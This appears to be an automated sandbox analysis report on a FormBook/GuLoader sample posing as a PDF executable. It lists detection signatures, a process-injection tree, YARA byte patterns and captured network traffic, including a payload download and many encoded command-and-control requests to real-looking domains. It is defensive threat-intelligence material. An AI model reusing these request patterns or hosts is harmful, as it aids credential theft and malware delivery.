Windows Analysis Report
BM-FM_NR.24040718PDF.exe

Overview

General Information

Sample name: BM-FM_NR.24040718PDF.exe
Analysis ID: 1430949
MD5: 7206084219e20fe7575aec63a3422a5c
SHA1: 930508090c6ec226838189c1d6ca32035c2ac0ed
SHA256: 3fb935f3b274dddf25a926967ceb573ad0f990bff966583157849545c60c42e4

Detection

FormBook, GuLoader
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • BM-FM_NR.24040718PDF.exe (PID: 7220 cmdline: "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe" MD5: 7206084219E20FE7575AEC63A3422A5C)
    • BM-FM_NR.24040718PDF.exe (PID: 2376 cmdline: "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe" MD5: 7206084219E20FE7575AEC63A3422A5C)
      • asoFfnDVnWYESbbZcbazpTYkAQVO.exe (PID: 6428 cmdline: "C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • write.exe (PID: 3628 cmdline: "C:\Windows\SysWOW64\write.exe" MD5: 3D6FDBA2878656FA9ECB81F6ECE45703)
          • asoFfnDVnWYESbbZcbazpTYkAQVO.exe (PID: 7240 cmdline: "C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3748 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a4b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13aef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x436b6:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x2ccf5:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
        No Sigma rule has matched
        No Snort rule has matched

        AV Detection

        Source: BM-FM_NR.24040718PDF.exe, Virustotal: Detection: 12%
        Source: Yara match, File source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: BM-FM_NR.24040718PDF.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknown, HTTPS traffic detected: 37.251.143.215:443 -> 192.168.11.20:50244 version: TLS 1.2
        Source: BM-FM_NR.24040718PDF.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: write.pdbGCTL source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: write.pdb source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: wntdll.pdbUGP source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: BM-FM_NR.24040718PDF.exe, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, write.exe
        Source: Binary string: mshtml.pdbUGP source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, Code function: 0_2_00406033 FindFirstFileA,FindClose, 0_2_00406033
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, Code function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004055D1
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, Code function: 0_2_00402688 FindFirstFileA, 0_2_00402688
        Source: C:\Windows\SysWOW64\write.exe, Code function: 5_2_02FDB810 FindFirstFileW,FindNextFileW,FindClose, 5_2_02FDB810
        Source: C:\Windows\SysWOW64\write.exe, Code function: 4x nop then xor eax, eax 5_2_02FC92D0
        Source: Joe Sandbox View, IP Address: 84.32.84.32
        Source: Joe Sandbox View, IP Address: 64.190.62.22
        Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic, HTTP traffic detected: GET /calitateX/lUMnxNJflRDqoVSbz65.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: absorbante-calitate.ro | Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=Rt3kyQgIVYud0ZxfjVmkNGlq6oguJ3Bu0zZO/jPZwrZwphqha226ELu53C2wC06UMZB3RXlB5IubdFV8wNllBFtqfqdEgmnsNC5NpQzeW4FZZkQ+d4TAHSc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.arilyfarlico.ruUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=0rOrON9KCedqtp/KEErYODOsqb1Ol5SKTVjby8oNAnBpXQ3f6KiEeGIyIQ0Oonef/1tP4f58WruRrbReuj87L8qx+pUtt26y1FhkvVaaULxp4u5kv8q4N/k=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.donantedeovulos.spaceUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=TrWImKkXg72XbxtkItxdCHOg9XWXWDqE4iO1qHTBwn9T3tQecLtkumbZqYeYuSkxtGpQmOvVFI5PSbSpBsnHilSWnmtQ3orkxGs2pUIdqKkLQC6qurdmbFs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kader42.topUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=/YVHZOSW055QRFdzHV7EG4MPV06WciwOGAsmatOqDuiKItV6nqBs0pBRyzlLrNgNpWUhFR7Gbz8/7vzQvyrSOcbiMu9Z7oEFzfRxNbVqKIwXHjZvBpZwwR0=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.noispisok.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=IdWor3433k1T0EOhXt9dLiY9DbR+hWBcDBqvgnp+doAH8LsyGz9SvmmDD05EUVbRqIr7chpXUFkFyWAkdZSUbSWj4Fm/Hc2PGDqx2ZME3zVnMVls2zAW0u4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kansaiwoody.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=4GuIeZ5/FrknERHMXrNh6P2zNKgrxoOsX8fLf9+FvaUhJPhi6YvqajOryTNmV9FzTg+fg8zx27kOMjM9ARbv/mO9DinSc6hkOsxZ/ooW+MqGv6LVFVbELEQ=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.a-two-spa-salon.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=983bcoiGgeytF04qoACGbDKY/XdXjFbfWR4mUmAai3szv0RRsFt8B5NwzCzTf8Kup64VkssKhH1SAFuTkhM3B+3j/r4OeS1gek1PDXkJF4iS0+BJcCSan5A=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.techfun.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=OmGyc5P3HC4gilwd2aY8392rI7ekMFe8/FNw83qBYcD4CWN3uhWBPhzZSt3lBo5o5sC5ats8mUsRdTFftG6L4VjYphbRhm0WEo/D3mWtey64RraPnZAfyak= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.ogunlewefamily.org.ngUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=27hjRPCyRlHKx+9Yvp9X/66HqVrlT4yXNX1Fx10RnhcFdFyjtbgqtspXt/m7h19M1tNaQu/ADV6ErOuMACLC0xl2a7R1sTqGKQn1UwmaLCfsUIitr9DM5TM=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.387mfyr.sbsUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=gPmRQJtWqOniEM4QRYssNN1Z+6d7UeIsnmjN3YDy8B2ChygMtzhOiKO2U7rNAXgtrRM7pNM3lf9QxBLsAyZPQtIaU4REtcvgBDtZA8Dv/AhV5YtMj725a40= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.nurenose.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=PHd15HH4KfPc0usCsZkSxG972lDJtR4Pjc4etW3YVFy3SYU2ewDgVW1TagnS2dO7KixciWH8BWdXpsVg20loSBMgq1tvcXpNFyUGPl5UEoDw0JtEo5FA5Us=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.lm2ue.usUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=1MJjEON/uhpbuDEqbkHBFEkwk/hMmapOQ6TXfH8Ig3o6kyo9vDLLjAAJ58FhZwMWBw3WEeqXS0siPV8x1sARUVUsjrzf4e0UfFtBtuYJdiL+lQFlVX0tNTo=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.whjzff.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=fnwN1v/cGsL5Viy/xGPo7bu3BFyPSCGRcDxJWuOrmZaTk6+QfBJJ6K85NdT8x6wg+kdjGkUCY343uxqa5Yt4yEVQtg3mZjTzeLq2Z0Ov3khzfcaVVj80n48=&ad64=U4M8cbh8kd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.concretedailypress.netUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=27hjRPCyRlHKx+9Yvp9X/66HqVrlT4yXNX1Fx10RnhcFdFyjtbgqtspXt/m7h19M1tNaQu/ADV6ErOuMACLC0xl2a7R1sTqGKQn1UwmaLCfsUIitr9DM5TM=&ad64=U4M8cbh8kd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.387mfyr.sbsUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: asoFfnDVnWYESbbZcbazpTYkAQVO.exe, 00000006.00000002.17956910913.0000000002522000.00000004.00000001.00040000.00000000.sdmp, String found in binary or memory: .www.linkedin.comTRUE/TRUE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2" equals www.linkedin.com (Linkedin)
        Source: unknown, DNS traffic detected: queries for: absorbante-calitate.ro
        Source: unknownHTTP traffic detected: POST /8cgp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brCache-Control: max-age=0Content-Length: 202Connection: closeContent-Type: application/x-www-form-urlencodedHost: www.donantedeovulos.spaceOrigin: http://www.donantedeovulos.spaceReferer: http://www.donantedeovulos.space/8cgp/User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0Data Raw: 58 68 39 6c 58 3d 35 70 6d 4c 4e 34 38 67 4b 72 45 66 36 4b 54 6e 48 47 66 31 4b 78 4f 59 6a 64 77 79 70 2b 53 63 65 51 37 4a 34 34 67 4c 41 6b 52 32 42 52 61 6a 33 5a 66 42 63 56 38 43 4b 56 45 46 6d 51 43 42 38 33 52 78 2f 6f 39 39 62 37 47 75 39 72 46 61 6b 67 6f 5a 55 4d 6d 4f 32 63 49 39 36 69 7a 39 36 41 64 2f 6e 55 53 61 59 5a 51 30 6e 38 70 66 6f 4b 57 49 48 50 2b 68 4d 4d 71 75 4f 78 6d 43 66 76 64 69 33 7a 2b 33 68 6e 6a 54 76 47 45 65 63 70 6f 79 69 30 4b 2b 44 59 72 51 51 57 6e 58 6a 6e 4f 48 30 4b 79 49 32 78 59 6c 42 7a 4e 4b 57 43 30 6c 71 68 4e 71 2b 78 4f 30 4c 50 39 71 34 67 3d 3d Data Ascii: Xh9lX=5pmLN48gKrEf6KTnHGf1KxOYjdwyp+SceQ7J44gLAkR2BRaj3ZfBcV8CKVEFmQCB83Rx/o99b7Gu9rFakgoZUMmO2cI96iz96Ad/nUSaYZQ0n8pfoKWIHP+hMMquOxmCfvdi3z+3hnjTvGEecpoyi0K+DYrQQWnXjnOH0KyI2xYlBzNKWC0lqhNq+xO0LP9q4g==
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:29:20 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:29:23 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:29:26 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:29:29 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:29:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"Data Raw: 34 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 
73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:29:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:29:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:29:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
